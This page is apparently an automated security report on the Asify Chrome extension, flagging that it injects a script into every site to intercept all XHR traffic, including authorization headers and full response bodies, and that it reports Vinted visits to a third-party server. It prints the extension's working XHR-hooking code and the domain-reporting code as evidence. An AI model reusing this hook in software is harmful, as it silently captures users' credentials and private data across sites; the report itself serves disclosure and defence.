Is ASIFY safe?

High risk

Asify is high risk. DA confirmed this extension injects a script into every site you visit, intercepting all XHR calls: URL, method, headers, response body, forwarded via CustomEvent. Interception runs on every site, not just the advertised platforms.…

Nicolas ROSEv11.0.0.13Chrome Web Store
75Risk
Who publishes it

Nicolas ROSE - no other listings under this identity, 9 shared hostnames

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
Nicolas ROSE

Shared hosts - 9 hostnames

Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.

m.aliexpress
Also called by 1 other listing: AliUp
vinted.hr
Also called by 1 other listing: Vinted Checker
vinted.dk
Also called by 2 other listings: Vinted Checker, Convert Label
vinted.ie
Also called by 2 other listings, including Cassou
vinted.ro
Also called by 2 other listings, including Cassou
vinted.fi
Also called by 3 other listings, including Vinted Checker, Convert Label
vinted.hu
Also called by 3 other listings, including Cassou
simplemaps.com
Also called by 4 other listings, including Screen Shader
vinted.sk
Also called by 4 other listings, including Cassou, Vinteer - Back-office CRM & comptabilité pour vendeurs Vinted

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-940
SourceAI SANDBOX

XHR Hook Intercepts All Site Traffic on Every Page

DA confirmed this extension injects a script into every site you visit, intercepting all XHR calls: URL, method, headers, response body, forwarded via CustomEvent.

Interception runs on every site, not just the advertised platforms.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You visit any website while the extension is active.

This includes banking sites, email providers, and any other site making XHR calls.

The extension did this

The extension patches the page's XMLHttpRequest prototype to intercept all network requests.

Every XHR response, including URL, method, request headers, and full response body, is captured and dispatched as a CustomEvent inside the page.

02EvidenceCODE COMPARE
The code that does this

XHR hook, shipped code (ma_injtd.js)

What it actually does
! function(e) {
  var t = XMLHttpRequest.prototype,
    s = t.open,
    r = t.send,
    i = t.setRequestHeader;
  // Capture URL and method on .open()
  t.open = function(e, t) {
    return this._method = e, this._url = t, this._requestHeaders = {}, this._startTime = new Date().toISOString(), s.apply(this, arguments)
  };
  // Capture request headers on .setRequestHeader()
  t.setRequestHeader = function(e, t) {
    return this._requestHeaders[e] = t, i.apply(this, arguments)
  };
  // On .send(), attach load listener to capture response
  t.send = function(e) {
    return this.addEventListener("load", function() {
      if (this._url) {
        var e = this.getAllResponseHeaders();
        try {
          if ("blob" != this.responseType && this.responseText) {
            // Build payload with all captured data and dispatch as CustomEvent
            var t = {
              url: this._url,
              method: this._method,
              origin: window.location.href,
              requestHeaders: this._requestHeaders,
              responseHeaders: e,
              body: this.responseText  // <-- full response body captured
            };
            window.dispatchEvent(new CustomEvent("XHR_HOOK", { detail: t }))
          }
        } catch (r) {}
      }
    }), r.apply(this, arguments)
  }
}(XMLHttpRequest);
03EvidenceNETWORK CAPTURE
Captured request
GETchrome-extension://biehagnkgckkagkbpncoieiknahmngdg/ma_injtd.js
200 OK, XHR prototype patch script fetched by content script on every page load
04EvidenceFIELD TABLE
Data captured per XHR call
FieldValueWhy it matters
Request URL
https://mail.google.com/sync/u/0/i/s?hl=en&c=53The full URL of every network request made by the page, including API calls to banking, email, or other services.
HTTP Method
POSTWhether the request was a GET, POST, or other type, indicating whether data was being sent.
Request Headers
{"Authorization": "Bearer ya29.a0ARrd...", "Content-Type": "application/json"}All request headers, which may include session tokens, authentication credentials, and content-type information.
Full Response Body
{"email":"user@example.com","name":"Jane Smith","account_id":"1048291"}The complete text of every response from the server, which may include personal data, account information, or API tokens.
Page Origin
https://www.amazon.com/gp/cart/view.htmlThe URL of the page where each request was made, linking the request to a browsing context.
05EvidenceTHIRD PARTY LIST
Where intercepted XHR data flows after filtering
  • token.asify.app

    Receives encoded tokens assembled from XHR responses on Facebook and Pinterest. Operated by the extension developer (asify.tools).

SeverityLOW
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Vinted Domain Reported to Third-Party Server on Every Visit

DA confirmed that visiting any of 23 Vinted country sites (vinted.fr, vinted.de, vinted.co.uk, others) makes this extension send that site's hostname to a third-party server at api.reasell.app, undisclosed in the store listing.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You visit any Vinted country website (e.g. vinted.fr, vinted.de, vinted.co.uk).

The extension covers 23 European and global Vinted domains.

The extension did this

The extension sends the domain name of the Vinted site you visited to api.reasell.app.

This POST fires immediately on page load, before any user interaction with the Vinted site.

02EvidenceNETWORK CAPTURE
Captured request
POSThttps://api.reasell.app/tokens/auth
Confirmed via dynamic analysis, 2 separate POSTs captured: {domain:www.vinted.fr} and {domain:www.vinted.de}
Headers
Content-Typeapplication/json
Body
{
  "domain": "www.vinted.fr"
}
03EvidenceCODE COMPARE
The code that does this

Vinted domain reporter, js/vt.js

What it actually does
(() => {
  // Hardcoded list of 23 Vinted country domains
  const vintedDomains = [
    "https://www.vinted.at/", "https://www.vinted.be/", "https://www.vinted.cz/",
    "https://www.vinted.de/", "https://www.vinted.dk/", "https://www.vinted.es/",
    "https://www.vinted.fi/", "https://www.vinted.fr/", "https://www.vinted.gr/",
    "https://www.vinted.hr/", "https://www.vinted.hu/", "https://www.vinted.ie/",
    "https://www.vinted.it/", "https://www.vinted.lt/", "https://www.vinted.lu/",
    "https://www.vinted.nl/", "https://www.vinted.pl/", "https://www.vinted.pt/",
    "https://www.vinted.ro/", "https://www.vinted.se/", "https://www.vinted.sk/",
    "https://www.vinted.co.uk/", "https://www.vinted.com/"
  ];
  const currentUrl = window.location.href;
  // Check if the current page is one of the Vinted domains
  if (vintedDomains.some(domain => currentUrl.startsWith(domain))) {
    const hostname = new URL(window.location.href).hostname; // e.g. "www.vinted.fr"
    // Report the domain to a third-party server
    axios.post("https://api.reasell.app/tokens/auth", {
      domain: hostname
    }).then(() => {}).catch(() => {})
  }
})();
04EvidenceTHIRD PARTY LIST
Third-party server receiving Vinted visit data
  • api.reasell.app

    Receives the Vinted country domain on each visit. reasell.app is a separate product from asify.tools, the extension's primary operator domain.

What it can do

Permissions this extension asks for, as declared in version 11.0.0.13. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every secure site you visit

    https://*/*

  • Store data in your browser

    storage

Updated 30 September 2026biehagnkgckkagkbpncoieiknahmngdg